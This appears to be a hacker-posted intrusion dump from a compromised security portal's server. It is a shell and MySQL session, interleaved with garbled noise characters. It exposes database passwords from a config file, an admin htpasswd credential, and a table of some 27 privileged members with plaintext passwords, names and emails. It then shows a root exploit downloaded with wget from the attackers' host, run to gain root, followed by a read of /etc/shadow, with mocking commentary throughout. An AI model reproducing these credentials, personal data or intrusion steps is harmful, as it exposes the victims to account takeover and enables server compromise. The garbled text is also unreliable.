; V+ w' R; W* E! L) F4 ]$ l, F. Ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .; ^! T- O$ n3 v# T P0 q7 |1 Y4 Z7 `
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
2 U$ W% `( R, n5 mdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0076 s1 N1 X7 f& m3 U- K$ y# H7 E
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
# k- z+ |8 g/ o# V$ s! Tdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com" ~" A5 S: K/ R v: t9 F$ r
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
8 _9 |' |3 A7 a. r6 ^- _ S# t/ c6 adrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
# l1 C# p7 @( S" f( J$ Y-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
- p2 f. F* O* R! g, \3 |: G1 \drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config7 i2 E: L" [7 Z( E" }
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
3 |& W. f1 c& P7 G3 adrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
; P) W" b" ]3 a" X! c2 a2 u5 G) `-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
) F0 z( u% e* n- _6 Z7 s-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico% i2 P8 Y9 G) H" U* E2 ^! f
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
/ F2 S, ~2 F7 q0 C; x: Jdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
- y N) n) w4 m2 J6 U0 F0 b6 g-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
& V, F4 c) z. U( {7 ~4 `-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess: B0 n- [- B3 h( z' ~
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
7 o3 o5 ^& \8 `" w-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
7 Q) D- U" E% o) @-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
! E& N" G* `2 Y, J. I* s$ ?-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php. B3 `0 E/ u {! w- c- D5 }
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf& P* j/ M) w0 S( M7 P4 g
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
7 ?- O, V/ f7 M+ G4 Adrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang: u1 q3 E- ]) d3 s6 _9 r0 q* V' X
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
( S" Z5 `' L1 d; C4 Ddrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
. K8 W9 l* u/ g% ^ v1 ?1 w( gdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member/ M- J* c9 X4 u* a; n9 h- ]. T1 [& L
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
) t3 S- [; n8 X; C2 n7 q0 @! mdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new) R& Z% S7 f% W! P
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf( y, X- N! z6 w& D/ ]; B1 E2 k
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
8 ~4 X1 V t _) B {( t-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
5 T* e' A# ]! @7 d: J) `7 h+ Vdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss0 H9 x" `3 T' h q& _; N$ r
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
9 J) M% n8 I5 u: ^drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com% N$ D9 ^0 d+ ~) b( b5 m
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
# p5 t7 ], O2 {drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
( h1 B3 Z- |+ ^8 h1 [7 u4 [drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl* q1 |( @5 u4 k" e! J( w( ]! l
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
) @0 k5 \* i' s# h/ H6 vdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
K1 g+ J+ _! F% Z. u- g% h-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
; A* h. B9 N. ^0 ~! T7 g8 T' s, |drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki: v( W8 j: L( D9 s4 h6 u0 j
& Z/ G ?/ }+ J2 ^, D0 \( W$ l' }
sh-3.2$ head -20 index.php& m3 W B: p% b- B0 T8 O
<?PHP
2 |% W, ?7 N5 _9 K: Z! U, r [. u/** t2 d5 A3 T& I6 t2 h! F8 U d+ X- B" B
* Mainfile (external) for astalavistaNET v2.0
$ L \# s4 e0 z: |/ m% N9 f*
( H1 l! v7 |2 G$ p* @copyright Astalavista IT Engineering GmbH5 ~2 L& w' c `6 u; C
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>6 C h Y: S# w$ ?2 K
* @version 1.0# y$ J+ a) P2 a' g6 P0 A
*/
1 }) n2 o- Z+ p" O) Z7 ?8 V5 W+ s. n. T+ U) b, i0 V6 p! R+ G' W
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {- r/ Q" [9 C) c
$dontStartSession = false;/ |* M. C. ]2 C2 j' q5 `
} else {# v) x3 ]7 \* h0 B
$dontStartSession = true;
7 B5 X: L4 [2 [9 v) p* D }
. u( z" y" m4 P2 ^4 t require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
4 D6 c H! Z) _; j% W2 t require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);! f" A( r2 V$ N7 O) h( m5 o& X
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
/ k5 S+ y! l5 Q require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);# S- B; d% `* E& v
- E& ~; k1 F* J8 j
sh-3.2$ cd config
( k2 Y- q. V/ V2 _) D _9 T0 D; [0 [sh-3.2$ ls -la+ A* W- R9 R8 z% A' d
total 323 b) v- O9 _! `! f. D7 Y
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
) o j& h2 X1 T2 cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! V$ {5 n$ {2 _( w' M-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
! q' v+ t. x4 B' w. @, d4 i$ A- |-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
1 m0 H9 a/ e7 {+ Z/ E& G-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php1 }( f5 }" `+ d7 b( u. F( X
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
: o1 I& G( q' ^5 \-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php! `) _; X8 l0 [* u
6 B s7 u2 y/ G2 ]7 i9 xsh-3.2$ cat com.conf.php
4 B, q4 e; {( ^: ^: G[snip]
, n4 P9 d9 C3 G/ R- a8 j) y- H8 j//member-database
7 v |2 @; }1 h7 j9 l$ V% F5 C$_CONFIG['db_mem_server'] = ‘localhost’;3 L" W0 q2 z; {3 L3 s8 C
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;. C3 t. E/ @( D1 `; U2 ^8 D
$_CONFIG['db_mem_user'] = ‘astanet_db’;
5 W+ I7 f, K( Q3 U! v. P6 |( B$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
% u! D# S* L, O# ^6 P$ P' m8 m$_CONFIG['db_mem_debug'] = false; //true or false
D* ^( M( n ?//ads-database
; X, V# S$ I- Q4 t. A0 D5 S$_CONFIG['db_ads_server'] = ‘localhost’;* O; ^, p0 D; F6 z* F# J o
$_CONFIG['db_ads_database'] = ‘astanet_ads’;& _/ _( s/ m( z2 V& `6 g5 G. a
$_CONFIG['db_ads_user'] = ‘astanet_db’;
6 O7 h: L+ Y! d( Z1 y$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
4 R5 z0 m4 n( S7 A4 y9 |" I7 \$_CONFIG['db_ads_debug'] = false; //true or false
6 M5 _/ J# F5 _* ^0 {//rainbow-database
$ y& v N: n' A" K$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
- @8 E& K0 X( D V; r, `$_CONFIG['db_rainbow_database'] = ‘rainbow’;
4 }$ W" P! w/ O* l+ b- l6 {$_CONFIG['db_rainbow_user'] = ‘dinu’;
6 |; D. e) P5 Y" m' q& P" e) B7 q$_CONFIG['db_rainbow_password'] = ‘dinudinu’;0 p) f8 W! P) B& z# L: q
$_CONFIG['db_rainbow_debug'] = false; //true or false
# r% \3 ]7 l, _; ^ j6 M6 B//mailing lists database% b: a- t* s! a7 ?& H4 ^
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
N8 u+ ^* B8 I! Q$ B, f) ]$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;) @2 A# s: Q0 {2 z6 K
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
* _' w1 n; ^" n% m0 G+ Y! l$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
1 f9 Y* f( g2 q& Y; k" P. _$_CONFIG['db_mailing_lists_debug'] = false; //true or false
7 C9 a4 V! j0 _2 e//paypal" w& Y. J) ?0 X4 y9 f5 L
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;! g, Z8 B1 G: n. M: W
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;2 Q' |; v& l, c
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;8 Q4 J: b1 a3 K( Y
$_CONFIG['sub_pp_noship'] = ‘1′;
0 U& U# Y- U# I9 P7 k8 [ M$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;- K! Q/ Z4 \! Q
[snip]8 I9 f) j1 U. B. a' P6 Z9 F
1 j x) A) u8 \
sh-3.2$ cd .." A9 \7 ~* g3 ?7 F
sh-3.2$ cd member
2 y }4 K1 v. K. h: P( Hsh-3.2$ ls -la1 H8 w& z% d) `% ^
total 200 o: f: } f$ T0 X. X5 o6 R
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
& N: K9 o8 h! ^% b) {0 i' y& l. Pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, k$ \& q& Z! l7 ^-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess4 r# ?5 ]2 A ]) N/ T* C2 U2 ~
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
( Q; y5 Q) L- Y2 Wsh-3.2$ cat .htaccess
% G8 J8 \2 K! t$ p, x5 a mSecFilterEngine off
8 @" P1 D. D8 V3 q$ ~
# y+ f; R q6 V0 y: ^sh-3.2$ cd ..
' z! L( E# z9 q) e, N" ~sh-3.2$ cd cron
" h9 j- V) \9 Z" T7 Q! Psh-3.2$ ls -la
* o. D+ _# ^: f9 vtotal 168& e0 q5 E9 N: Q% G
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
3 u8 b& _2 t# g5 qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..& U9 k9 {& y) ~$ v
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php$ T- N7 N" t7 v9 w0 {1 a# C
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
) {0 X0 Y5 y2 I; `( }) J: F-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php4 z. y9 W3 N, Y; ?/ d% B
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php8 L: N' n# C0 X" U
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php2 l/ P, }8 d& L' s, F1 R
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
4 P% p1 ^7 l Z5 S-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
7 \. D d& O- W# ^, e-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php$ p+ y+ n( m3 n
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
+ q; ^. q6 z9 E0 {* P" N/ O4 k) }! p-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php, O4 s5 v8 Q* W& \. o. V
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
* X8 ^7 Z9 v: l3 j: g( h-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
; q( U$ J& V# h5 b2 F# O& c( `& d, a-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
! ?2 H/ M- K' N4 Q-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
9 ~9 S4 F4 Z5 X3 W+ B-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
; ^9 P$ l( b4 J-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
1 ?5 G) V) z1 t2 ~4 v: A-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
0 Z- \/ x0 Y. ?/ [-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
% m2 {; I" o9 |, k. A. Udrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
3 q" t2 }2 O/ f! z8 R-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php& D. K, w/ z% a- I" T
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
# P! ^" Q+ O! g; B0 I0 O1 y& W. i/ q4 C, f K7 s
sh-3.2$ cd ..! d) R! X9 P8 v' q8 l% n+ W
sh-3.2$ cd _0076 M/ ?1 _. K5 v
sh-3.2$ ls -la
, I' w) q4 \- k& M" [6 |. gtotal 24
( p1 j- B! R) g8 \9 S& C" qdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
p- U3 P/ s& c' c% Tdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
) ~6 U& S. k# l/ ~-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
' S R& H x8 @/ H% S-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
% [9 ?: \/ `, H- u-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
( g& a+ o4 P3 w( sdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
+ n9 _) J! M0 H# B+ G9 R: H2 K6 a* y7 \ w5 }+ t" k; s( [. A+ O* @$ A
sh-3.2$ cat .htaccess! y2 r L ]( z5 j; T1 E: {, l# d
authType Basic
$ m1 k% d( q G6 XauthName Admin4 }. g3 i, Y' m- A- ~) ]
authUserFile /home/astanet/auth/.htadm_pwd- [1 \! j. a" N8 Q
require valid-user% ~7 R/ y! Z5 X
; Z% p8 k) ]- K }+ [, Nsh-3.2$ cat /home/astanet/auth/.htadm_pwd* m% x& o+ K. G7 B, W* R
admin2net:CR0bl65MwhfT: z0 p1 H ]9 a2 j4 Y6 i* W9 J
' X# {5 E. r' q/ T; H; E( }8 dsh-3.2$ mysql -u astanet_db -p
9 z1 z( j8 c2 J* Y P; A; U$ B' KEnter password:3 c* w4 W: K, m+ }7 r
Welcome to the MySQL monitor. Commands end with ; or \g./ @+ E1 V3 K, C- t% @ c# m% B4 w$ w
Your MySQL connection id is 275153 {& b, l! B2 ]$ q8 h8 \( S. k, Z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+ @8 [) [- ~+ S
0 E. {2 d" [8 R! e" |Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* ^0 V6 O) h! p1 n* P8 r6 X( H5 e
, l5 x- C& B1 a" amysql> show databases;
2 {5 Y! @4 O' s: w, ~0 {+———————–+. N( K9 w/ o: ^8 j: }
| Database |
: [; M9 u: Y7 y1 I; h+———————–+
( _% A" O ~5 ~4 V1 h5 h* X| information_schema |
# c" i- h ]; l7 e+ F| astanet_ads |
5 _( a7 q) K0 a| astanet_mailing_lists |# [+ Z6 Z! T- f: l4 g; U5 n' ?
| astanet_mediawiki |+ ?1 }, r7 ?2 o4 J& d
| astanet_membersystem | Q6 t7 F" b1 Q4 Y3 }. Y. I
| test |, @; B" C3 Y- d; I, E7 F
+———————–+9 \5 b9 ^7 H' ?0 q& B/ e# M
6 rows in set (0.00 sec)
+ R) U$ Z P# a$ }
$ O s- e# Z- t6 x/ \) a- J% a( i$ Lmysql> use astanet_membersystem1 o0 J9 G. y% T- x. i, u3 X
Database changed
2 O7 _* \, @, Gmysql> show tables;! \0 S* x3 ]4 [5 N( X: j9 k
+———————————–+
6 h/ O2 q) v" ^| Tables_in_astanet_membersystem |' F2 f% g8 C9 U& U
+———————————–+
8 Z8 e! J$ _- V' `( ?0 K5 J| blacklist_categories |
2 `0 ^7 K) [4 U: S3 r! p7 i U| blacklist_content |9 ^% o% V& `. v4 T& \1 E% @* u |
| blacklist_levels |
7 H! i; M T: e| blacklist_mcset |4 U4 i0 |) X& q2 c) ]
| dir_categories |9 ?- `' C4 @+ L0 y3 q
| dir_comments |, N8 v; J9 h1 y3 U4 d) `
| dir_links |
0 G% k9 ?6 D4 _| dir_temp |
! }$ p' c" z: p3 J' c| dir_votes |
5 J) H. l4 L8 e, s7 x3 r| documents |" ^2 D+ w7 S0 F! |9 s* I
| documents_categories |
o* W% w; W4 ^' A| email_content |# F( k4 k& B& }, [0 @: L' b
| email_settings |& s, a6 f/ L% \1 L- w" p
| exploits |
8 r. F5 f' J+ F' t% b! C| exploits_categories |
9 m `. A* d+ P" E0 O| exploittree_categories |
m+ M4 E# \% o| exploittree_exploits |) N* V N2 j7 z; C4 W
| home_values |3 e t: H$ c5 C+ L
| iso_countries |
7 `. k9 E2 W2 x, A! y| links_categories |
, Q0 D. Q- B9 C+ H6 }| links_records |
( U5 z& c0 ~; d3 c$ `| links_unauth |
1 S% x( j* l+ a X7 h) ~, o; h! H| links_votes |
# a6 S7 }% b. Z# L$ Q. @| log |
, k& X. S! ~2 c; z: O- [2 Z9 u, ?: `| news_categories |! j' I; i# l4 I% h
| news_comments |( Z% N: H* y9 Y$ ~
| news_emoticons |$ [: F8 X) X- I' G
| news_latest |' g" W1 m7 g. x8 r& L
| news_messages |
: F+ D" U6 _: a' r7 K( H4 c| news_statistics |! ~) Z! M; `, m- o. |* S* j: I s7 A
| news_votes |
! v2 w9 g S) F' ?; \* h| prices_content |
0 r Q7 g- J( n& T7 G| prices_offers |; L f2 r7 K0 i
| rss_settings |
! z- `: ~# @8 W0 _0 @- n F| sessions | ?4 B& o/ A* v& d9 D
| stats_signups |. H8 z, Q8 s9 N* G+ Z) @3 e
| u2u2 |
) k8 s- V$ \. w8 B| u2u_contact |
' i& t( Z9 M1 F) l7 c- C| u2u_settings |
. u. F# m; z$ A9 I, M$ U| user_keywords_selected_categories |
( ^- D, A* |" a5 A8 R| users |" p3 m2 L& r+ I/ a) B2 |
| users_ipn_test |
. n" ~3 N8 n- T, X1 v! @3 [/ Z, || users_keyword_values |7 ^! V- f& Z2 X9 x+ l# z( U
| users_profile |3 `" T- E! n8 O
| users_temp |
8 P' ?8 y% l9 r B| users_upgrade |
: W N3 j' r( X, x! I# C' p+———————————–+& e% Q7 r4 V# G& S- O/ d V1 Q$ E
46 rows in set (0.00 sec)
/ {9 `% h6 c* Q& S+ R4 ?
G0 g l+ X7 |: H3 U: a" {mysql> describe users;
N5 c- E, [7 c9 [4 S+————————–+————————————–+——+—–+———————+—————-+3 W7 H* p, `' g2 _" [* q
| Field | Type | Null | Key | Default | Extra |) `- Q8 y6 g9 c. x4 `( d* J5 i( K
+————————–+————————————–+——+—–+———————+—————-+2 w1 R5 b4 l# c" M2 N" V9 c. y
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
$ t/ k+ F2 L8 Z0 p1 ^| user | varchar(50) | NO | | | |
+ T! Y6 e# F0 L" C2 x9 p| nickname | varchar(30) | NO | MUL | anonymous | |; C o$ W( {7 @
| password | varchar(30) | NO | | | |
9 _4 s. A! m3 X) b| userlevel | tinyint(3) | YES | MUL | NULL | |: J5 u% }! u- J5 I0 j
| exp | int(8) unsigned | NO | | 0 | |& e% f. m2 E, v, H
| email | varchar(50) | NO | | | |
, |8 J- o2 `: s4 c( U2 I Y| ip | varchar(15) | NO | | 0 | |
8 y" Z7 Z% I x2 {/ ^* N| proxy | set(’0′,’1′) | NO | | 0 | |
- ^& I& N; p1 D| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |9 r" o* l3 E- S. X! M
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |) K9 U1 f! h |6 l, f, l
| anz_in | tinyint(1) | NO | | -1 | |5 W- L4 T8 i- o* d; \9 S; `
| status | tinyint(1) unsigned | NO | | 0 | |! e9 q. i2 N! l* R7 ]
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
( g, G6 {/ o+ q| freemember | set(’0′,’1′) | NO | | 0 | |0 @! j1 x% t6 r' o; u
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |2 |8 _5 R' B9 m+ z' Q
| lang | tinytext | NO | | | |
$ m: |! J: r7 N| adid | smallint(6) | NO | | 0 | |1 x( ~; O9 |7 s3 f& X
| pp_txn_id | varchar(255) | YES | | NULL | |
. j/ A/ D1 H) \+ i" {2 ^# [' k1 `" j% g| cnb_transaction_id | varchar(255) | YES | | NULL | |& N7 ]$ J/ r) q8 @
| cnb_order_id | varchar(255) | YES | | NULL | |' R5 e( g) n! W# e4 H0 x
| cnb_user_id | int(11) | YES | | 0 | |
/ `+ ^2 x) S% g) r+————————–+————————————–+——+—–+———————+—————-+% u- m( @) ^8 U; P; W! f+ |
22 rows in set (0.01 sec)/ P; M$ i3 v& Q& {+ l
n" J$ s# T- O5 C
mysql> select count(*) as skids from users;" \$ e1 `9 J3 X% r: n8 {) ]
+——-+6 Y* _" L$ Q( m6 e- L: }; z. q9 p
| skids |
0 n' @4 |6 O k. A$ G: R) g+——-+! {/ o7 K, E- I" g$ t6 g" O
| 25199 |
7 o3 V5 y0 A# o7 I! m L- r+——-+
0 A i! ^9 l7 w. q$ V/ e0 v. `/ K1 row in set (0.00 sec)
9 [. L7 D2 X: W! n7 I. j3 s
; u" }7 N2 f0 I: `! h5 hmysql> select user,nickname,password,email from users where userlevel = 1;8 S3 ^( w* {: |$ E5 s
+————————–+———————-+——————+———————————–+5 b) d1 l( B7 K' y- @% L3 t4 f
| user | nickname | password | email |9 a/ b+ J% x7 {8 W
+————————–+———————-+——————+———————————–+# z; o2 n1 Q. \7 `+ G( k, {
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
5 B- P2 R) K( {/ n) Z# t# |6 X| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
; { H$ Z, e& `% w% k Y/ K| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
+ x5 E0 Q w9 z! Y| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |( x0 f; q$ J: ~) }! Q/ @% [
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
# A$ C6 k) x& u/ `* [+ w| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
' I8 D( r1 t+ e* k. x/ i| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |# g) B% q9 E. v* w
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
4 i3 q% [. D& K+ ] y/ r$ E" K( c| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
9 f1 \7 p( F6 l8 X% f: M9 l| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |+ ~$ {9 N6 D$ t: ^0 A
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |$ G8 I( d8 T" p* t T3 Z& `
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |1 V% b* l. C2 x
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |4 }0 \: F- F1 o1 S
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |, U5 ?+ e5 Q9 K3 K
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
( ~# ?5 y' s- j! Z$ t5 D| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |& r& y. ?# @7 x+ }' ^; Q
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch | m4 I" H! f; z# u$ t2 s
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |0 B7 N/ |' w9 E, o0 K8 i
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |; l% O& c' Q: V% T
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |+ \$ f& s8 ^* c2 r F
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
' |, ^+ t7 y+ E| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
. X& V; m! l4 D) B& r& l H; D) P| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
4 I( I' x" Z. W1 @% \* f# s| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
# M4 ^, U1 \6 G5 H; M! K. D| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
2 H8 W9 ~$ V) a7 W; i. F| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |0 t% ^$ Q4 t1 I Y
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
4 G& ]* |- I/ k( [; c+————————–+———————-+——————+———————————–+
9 O" L9 T$ I( E3 B, {27 rows in set (0.00 sec)
/ }( r X8 ~+ B. j+ b s% t
* |6 t5 T4 L O' ?2 f. rmysql> exit;
: b8 a7 k2 J+ p, x/ A" H. lBye
0 K- L# F% E9 m
* B. R( J {" @ P- O[~] plaintext passwords? yes,
1 C d, k8 j% C& q$ J! vThose so called “security professionals” who charge you $6.66 / month to6 U' u# A5 @ s1 b J H
register at their hack-proof portal, save your passwords in plaintext…
0 b" I6 i: {1 E. z+ u! s. V% P5 @brilliant!$ c7 T* J- W) Z" z& Y" N: c3 A7 s3 N% O/ b
3 H, F/ e3 ]' C1 a/ r' m3 {: z2 b
[~] This been fun but we want more.8 l+ Q w4 L0 D% \+ A
3 M% o2 F. ]' {5 b- I3 d8 v2 wsh-3.2$ uname -a) }3 D; a/ V: P1 {! M+ q
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
. \) r5 V$ O7 csh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]: d4 m l x, V, g; o
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
, Z# T; h$ p/ B% U. ^* L3 a4 Y: UResolving anti.sec.labs… 13.33.33.37
6 i9 u/ Q _, h& YConnecting to anti.sec.labs|13.33.33.37|:80… connected.
& H/ }0 K8 U" c P2 ?; LHTTP request sent, awaiting response… 200 OK
& R2 [+ j1 S1 _5 s9 `' x/ [Length: 18200 (18K) [text/plain]
% s- R% v# Q7 }5 @$ O6 aSaving to: `g0troot’
. ?4 D8 j+ c5 [' J! J' s8 f0 }
8 Z; w$ f I* ?5 m2 f9 S100%[=========================================================================================================================================>] 18,200 58.6K/s in
- G7 G" y2 {5 I0 A0.3s
! }& c) a, F( k4 G9 F2 m0 G7 L- R) l# {1 ]: R& \/ _; _; w3 ^
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]7 \2 D; T4 W0 Y9 r
" \4 ` z5 h% @sh-3.2$ ./g0troot -i x86_64
# P" I" a0 l V7 S g6 ?3 ]! {( o[+] g0troot - anti.sec.labs
5 y, ?9 a4 X+ k# w8 P; L& f[+] Target: 2.6.18-128.1.10.el5: L' f2 C# E5 }% F
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]9 a% j, J7 o) m: Z" R! i
$ q: Z1 _9 x- P# @
[+] r00tr00t; q: }! Y2 b; {
[~] Executing shell…
. r9 ^7 q- s( {8 n! d0 f4 t# D6 w3 x0 ~7 |0 T' M% v! N7 H
sh-3.2# id/ \4 x$ x& J, I4 f
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)0 G( N4 R$ r( T" s* D" t
+ ] b+ Y, O$ M; E# t2 c% k2 msh-3.2# cat /etc/shadow- ?+ J& n% k6 D. H" I4 i- f
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::, p" `( F; e: G7 N+ g3 _& ]
[snip]
